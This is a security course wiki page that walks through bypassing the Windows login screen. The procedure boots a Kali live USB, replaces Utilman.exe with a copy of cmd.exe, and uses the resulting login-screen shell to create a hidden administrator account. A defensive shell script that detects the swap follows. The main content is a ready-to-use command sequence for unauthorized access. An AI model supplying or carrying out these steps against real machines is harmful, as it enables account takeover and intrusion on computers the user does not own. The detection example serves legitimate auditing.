Breaking into Windows - Adam-Hachem/SEC335 GitHub Wiki

How to gain admin access and bypass the login screen in Windows:

Live USB:

Download the Kali Live Boot image from the official Kali website.

Enter the BIOS and change the boot order to start with the USB, or manually boot into the USB.

Modify System Files:

On your temporary Kali system, run fdisk -l as root to identify the Windows partition.

Create a mounting directory: mkdir /mnt/windows

Mount the partition: mount /dev/sda2 /mnt/windows. Change sda2 to whatever partition you found with fdisk -l.

Change directory to the System32 dir: cd /mnt/windows/Windows/System32

Rename the original accessibility binary: mv Utilman.exe Utilman2.exe

Copy cmd.exe into its place: cp cmd.exe Utilman.exe

Leave the mounted partition: cd ~

Unmount the partition: umount /dev/sda2. Again, replace this with the partition you found earlier.

Break in:

Go back to the BIOS and undo your boot-order changes so the machine boots into Windows.

After booting, click the Ease of Access button on the login screen. Because Utilman.exe is now a copy of cmd.exe, a CMD shell should appear.

Create a new user with net user Kali /add

Give the new user admin permissions: net localgroup Administrators Kali /add

Restart the computer

You should see the new user!
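
The steps above leave recognizable traces in System32, so the same offline mount can be used to audit a disk for them. The following is an added example, not part of the original wiki: check_utilman_swap is a hypothetical helper name, and the sample files are constructed placeholders rather than real Windows binaries.

```sh
#!/bin/sh
# Added example (not from the original wiki): audit a System32 directory,
# e.g. on a mounted offline image, for the Utilman.exe swap described above.
# check_utilman_swap is a hypothetical helper name.
# Returns 0 = clean, 1 = findings, 2 = bad argument.
check_utilman_swap() {
    sys32="$1"
    findings=0
    [ -d "$sys32" ] || { echo "error: not a directory: $sys32" >&2; return 2; }

    if [ ! -f "$sys32/Utilman.exe" ]; then
        echo "FINDING: Utilman.exe is missing"
        findings=$((findings + 1))
    elif [ -f "$sys32/cmd.exe" ] && cmp -s "$sys32/Utilman.exe" "$sys32/cmd.exe"; then
        # Same bytes as the command shell: the cp step has been performed.
        echo "FINDING: Utilman.exe is byte-identical to cmd.exe"
        findings=$((findings + 1))
    fi

    # Renamed originals such as Utilman2.exe left behind by the mv step.
    for f in "$sys32"/Utilman?*.exe; do
        [ -e "$f" ] || continue   # glob did not match anything
        echo "FINDING: unexpected sibling file: ${f##*/}"
        findings=$((findings + 1))
    done

    [ "$findings" -eq 0 ] && echo "OK: no Utilman swap indicators in $sys32"
    [ "$findings" -eq 0 ]
}

# Constructed sample: a fake System32 in the state the steps above leave behind.
demo=$(mktemp -d)
printf 'constructed-cmd-bytes' > "$demo/cmd.exe"
printf 'constructed-utilman-bytes' > "$demo/Utilman2.exe"
cp "$demo/cmd.exe" "$demo/Utilman.exe"
check_utilman_swap "$demo" || echo "result: tampering indicators present"
rm -rf "$demo"
```

Point the function at the System32 path of a read-only mount, for example /mnt/windows/Windows/System32.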